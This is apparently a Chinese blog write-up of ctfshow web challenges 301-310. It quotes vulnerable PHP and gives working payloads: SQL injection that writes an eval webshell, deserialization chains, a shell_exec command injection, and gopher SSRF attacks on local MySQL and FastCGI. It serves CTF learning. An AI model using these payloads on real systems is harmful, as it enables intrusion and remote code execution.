ctfshow web入门 代码审计

最新推荐文章于 2024-05-27 17:42:35 发布
最新推荐文章于 2024-05-27 17:42:35 发布
阅读量735 收藏
点赞数
分类专栏: CTF 文章标签: php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/119375945
版权

文章目录

web301

下载源码后在checklogin.php发现问题代码

<?php
error_reporting(0);
session_start();
require 'conn.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
	$_SESSION['error']="1";
	header("location:login.php");
	return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}
$_SESSION['error']="1";
header("location:login.php");
?>

这里有一句完全没过滤的sql查询语句,而username是我们可控的,再看它下面的逻辑,会将查询到的用户名和密码比较,如果用户名和密码相同就登陆成功。

strcasecmp(string1,string2)
string1 必需。规定要比较的第一个字符串。
string2 必需。规定要比较的第二个字符串。

该函数返回:

0 - 如果两个字符串相等
<0 - 如果 string1 小于 string2
>0 - 如果 string1 大于 string2

那这里就可以用联合查询让username返回1

payload:

userid=-1' union select 1%23&userpwd=1

或者也可以用sqlmap去跑

web302

修改了代码的一个地方

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

直接写马即可,虽然经过sds_decode()函数的处理,但是他的sql语句已经执行了

payload:

userid=-1' union select "<?php @eval($_POST[a]);?>" into outfile "/var/www/html/a.php"#&userpwd=1

web303

先用弱口令admin/admin,诶,直接进去了,但是并没有flag,审计下载的源码,在dptadd.php发现注入点

<?php
session_start();
require 'conn.php';
if(!isset($_SESSION['login'])){
header("location:login.php");
return;
}else{
	//注入点
	$_POST['dpt_name']=!empty($_POST['dpt_name'])?$_POST['dpt_name']:NULL;
	$_POST['dpt_address']=!empty($_POST['dpt_address'])?$_POST['dpt_address']:NULL;
	$_POST['dpt_build_year']=!empty($_POST['dpt_build_year'])?$_POST['dpt_build_year']:NULL;
	$_POST['dpt_has_cert']=!empty($_POST['dpt_has_cert'])?$_POST['dpt_has_cert']:NULL;
	$_POST['dpt_cert_number']=!empty($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:NULL;
	$_POST['dpt_telephone_number']=!empty($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:NULL;
	
	$dpt_name=$_POST['dpt_name'];
	$dpt_address=$_POST['dpt_address'];
	$dpt_build_year=$_POST['dpt_build_year'];
	$dpt_has_cert=$_POST['dpt_has_cert']=="on"?"1":"0";
	$dpt_cert_number=$_POST['dpt_cert_number'];
	$dpt_telephone_number=$_POST['dpt_telephone_number'];
	$mysqli->query("set names utf-8");
	$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
	$result=$mysqli->query($sql);
	echo $sql;
	if($result===true){
		$mysqli->close();
		header("location:dpt.php");
	}else{
		die(mysqli_error($mysqli));
	}
	
	 }
?>

这里可以在insert插入时注入。

payload:

dpt_name=1&dpt_address=1&dpt_build_year=2001-07-01&dpt_has_cert=1&dpt_cert_number=1',sds_telephone=(select group_concat(table_name) from information_schema.tables where table_schema=database())%23&dpt_telephone_number=

dpt_name=1&dpt_address=1&dpt_build_year=2001-07-01&dpt_has_cert=1&dpt_cert_number=1',sds_telephone=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')%23&dpt_telephone_number=

dpt_name=1&dpt_address=1&dpt_build_year=2001-07-01&dpt_has_cert=1&dpt_cert_number=1',sds_telephone=(select group_concat(flag) from sds_fl9g)%23&dpt_telephone_number=

web304

增加了waf

function sds_waf($str){
	return preg_match('/[0-9]|[a-z]|-/i', $str);
}

但是上题payload还是能用,只是把表名从sds_fl9g换成sds_flaag

web305

class.php中存在反序列化点,直接写马,在checklogin.php中传入

//class.php
<?php
class user{
	public $username;
	public $password;
	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
	}
	public function __destruct(){
		file_put_contents($this->username, $this->password);
	}
}

//checklogin.php
<?php
error_reporting(0);
session_start();
require 'conn.php';
require 'fun.php';
require 'class.php';
$user_cookie = $_COOKIE['user'];

poc:

<?php
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
}

$a = new user('1.php','<?php @eval($_POST[a]);?>');
echo urlencode(serialize($a));

然后在burp中抓包打
在这里插入图片描述
用蚁剑连接时要注意把cookie加上,否则连接不上,然后连接数据库,在数据库中获取flag
请添加图片描述

web306

mvc结构,先找危险函数,在class.php中发现file_put_contents()

class log{
	public $title='log.txt';
	public $info='';
	public function loginfo($info){
		$this->info=$this->info.$info;
	}
	public function close(){
		file_put_contents($this->title, $this->info);
	}

}

那么继续找在哪里调用了这个close()函数,可以发现在dao.php中调用

class dao{
	private $config;
	private $conn;
	
	public function __destruct(){
		$this->conn->close();
	}
}

最后只剩一个利用点,在index.php中,

<?php
session_start();
require "conn.php";
require "dao.php";
$user = unserialize(base64_decode($_COOKIE['user']));

且正好index.php中包含了dao.phpdao.php中包含了class.php

poc:

<?php
class dao{
    private $conn;
    public function __construct(){
        $this->conn=new log();
    }
}

class log{
    public $title='1.php';
    public $info='<?php @eval($_POST[a]); ?>';
}

$a = new dao();
echo base64_encode(serialize($a));

web307

下载源码后发现把上一题的关键函数close()换成了closelog(),不能再用上一题的思路。
还是先找危险函数,发现shell_exec()

class dao{
	private $config;
	private $conn;
	
	public function  clearCache(){
		shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
	}
}

因为是拼接的,在config.php中可以找到这个变量

class config{
	public $cache_dir = 'cache';
}

正好在dao.php中包含了config.php,那么就可以利用这个来rce,有两个反序列化的地方:login.php和logout.php,比较后发现logout.php中直接调用了clearCache()

$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
	$service->clearCache();
}

poc:

<?php

class config
{
    public $cache_dir = ';cat /var/www/html/flag.php > /var/www/html/3.txt;';
}

class dao
{
    private $config;

    public function __construct()
    {
        $this->config = new config();
    }

}

$a = new dao();
echo base64_encode(serialize($a));
?>

web308

发现上一题的rce处加了正则,利用不了,要寻找新的利用点
在fun.php中,发现了ssrf的利用点

function checkUpdate($url){
		$ch=curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_HEADER, false);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
		$res = curl_exec($ch);
		curl_close($ch);
		return $res;
	}

全局搜索一下checkUpdate()函数,发现在dao.php中使用到

//dao.php
public function checkVersion(){
		return checkUpdate($this->config->update_url);
	}

且在config.php中,mysql数据库无密码,网址可控

<?php

class config{
	private $mysql_username='root';
	private $mysql_password='';
	private $mysql_db='sds';
	private $mysql_port=3306;
	private $mysql_host='localhost';
	public $cache_dir = 'cache';
	public $update_url = 'https://vip.ctf.show/version.txt';

因此用gopherus生成payload
请添加图片描述
poc:

<?php

class config
{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%61%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%01%00%00%00%01';
}

class dao
{
    private $config;

    public function __construct()
    {
        $this->config = new config();
    }

}

$a = new dao();
echo base64_encode(serialize($a));
?>

web309

这题的mysql有密码了,不能再像上一题一样利用gopher协议ssrf,可以通过gopher协议的延时判断为打的是fastcgi

gopher://127.0.0.1:9000

继续用gopherus生成payload
请添加图片描述
poc:

<?php

class config
{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH72%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00H%04%00%3C%3Fphp%20system%28%27cat%20/var/www/html/f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}

class dao
{
    private $config;

    public function __construct()
    {
        $this->config = new config();
    }

}

$a = new dao();
echo base64_encode(serialize($a));
?>

web310

可以先读配置文件

poc:

<?php

class config
{
    public $update_url = 'file:///etc/nginx/nginx.conf';
}

class dao
{
    private $config;

    public function __construct()
    {
        $this->config = new config();
    }

}

$a = new dao();
echo base64_encode(serialize($a));
?>

看到4476端口是被监听的,且存在flag
请添加图片描述
那么直接访问即可
poc:

<?php

class config
{
    public $update_url = 'http://127.0.0.1:4476';
}

class dao
{
    private $config;

    public function __construct()
    {
        $this->config = new config();
    }

}

$a = new dao();
echo base64_encode(serialize($a));
?>
Lum1n0us
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 432
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
Ctfshow web入门 代码审计web301-web310 详细题解 全
Jay17的博客
09-21 1626
Ctfshow web入门 代码审计web301-web310 详细题解 全
ctfshow web入门 web306--web310源码审计
最新发布
2301_81040377的博客
05-27 599
链接:https://juejin.cn/post/7083293190022758407。访问1.php再rce就行了,但是不知道为啥我今天做不出来,弄了好一会了。商业转载请联系作者获得授权,非商业转载请注明出处。说的源码没变,这里我们写个EXP看配置文件。这些题都要在index.php发包才可以。我是终于找到了在一堆里面弄。这和之前的完全不一样了。作者:OceanSec。
ctfshow web入门代码审计 web301-305
m0_62207170的博客
04-20 458
ctfshow web入门代码审计 web301-305
CTFshow代码审计 web301-310
cht6667的博客
02-23 995
CTFshow代码审计部分个人做题记录
ctf_show笔记篇(web入门---代码审计
whale_waves的博客
03-13 1132
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。
ctfshow web入门(代码审计)
qq_53263789的博客
07-19 343
ctfshow
ctfshow web入门 web87
2401_83272517的博客
05-25 977
入门2年半还没有入门的菜坤的日常wp
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1434
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
CTFSHOW web入门——web30
m0_74093152的博客
04-23 256
passthru()函数同system()函数类似,都可以用来执行外部命令的,因此可以用passthru来代替system。因此构造payload:?把flag、system、php都给过滤了。查看页面源代码即可获得flag。
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
HGAME2022 Web WP
热门推荐
Lum1n0us's Blog
01-27 2万+
文章目录蛛蛛...嘿嘿♥我的蛛蛛Tetris plusFujiwara Tofu Shopeasy_auth 蛛蛛…嘿嘿♥我的蛛蛛 页面内有很多点我试试的按钮,只有一个是真的,能前往下一关,写个脚本跑一下 import requests from lxml import etree static_url = 'https://hgame-spider.vidar.club/f90e409178' url = 'https://hgame-spider.vidar.club/f90e409178' whil
ctfshow终极考核wp
Lum1n0us's Blog
01-17 3479
文章目录web640web641web642web643web644web645web646 web640 打开页面就能看到flag ctfshow{060ae7a27d203604baeb125f939570ef} web641 抓取首页的包,看到有一个Flag字段 ctfshow{affac61c787a82cc396585bea8ecf2dc} web642 在上面包里的源码看到css路径不寻常/system36d/static/css/start.css,在url后添加/system36d,抓包
ctfshow 摆烂杯web wp
Lum1n0us's Blog
12-27 3242
考试前不想复(预)习,正好是ctfshow的摆烂杯,就去做了几道web题 文章目录web签到黑客网站一行代码 web签到 题目要输入三个整数A、B、C,ABC均不可为0,让A³+B³+C³=114,刚开始还想着爆破,后面感觉到太慢了,开始随便输,发现输入1+1后会把他当成2来计算,那就很好办了,直接让输入数的幂为1/3即可 A=5&B=-1&C=-10**(1/3) 后面看群才知道。。 幸亏没爆破 黑客网站 f12后发现一堆字符串,题目也说了不用渗透和扫描,说明关键点就是这些字符串,.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值